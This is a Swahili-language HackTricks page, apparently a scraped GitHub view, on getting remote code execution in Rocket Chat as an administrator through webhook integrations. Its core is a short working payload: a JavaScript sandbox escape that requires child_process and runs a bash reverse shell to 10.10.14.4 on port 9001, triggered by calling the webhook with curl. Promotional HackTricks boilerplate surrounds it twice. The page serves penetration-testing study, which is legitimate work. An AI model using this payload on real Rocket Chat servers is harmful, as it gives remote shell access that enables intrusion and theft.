Rocket Chat

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

RCE

Ikiwa wewe ni msimamizi ndani ya Rocket Chat, unaweza kupata RCE.

Nenda kwenye Integrations na chagua New Integration na chagua moja kati ya: Incoming WebHook au Outgoing WebHook.
/admin/integrations/incoming

Kulingana na nyaraka, zote hutumia ES2015 / ECMAScript 6 (kimsingi JavaScript) kusindika data. Kwa hivyo tuchukue rev shell kwa javascript kama vile:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Sanidi WebHook (kituo na chapisha kama jina la mtumiaji lazima kuwepo):

Sanidi skripti ya WebHook:

Hifadhi mabadiliko
Pata URL ya WebHook iliyozalishwa:

Piga simu na curl na unapaswa kupokea rev shell

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.

3.8 KiB Raw Blame History

Rocket Chat

RCE

3.8 KiB

Raw Blame History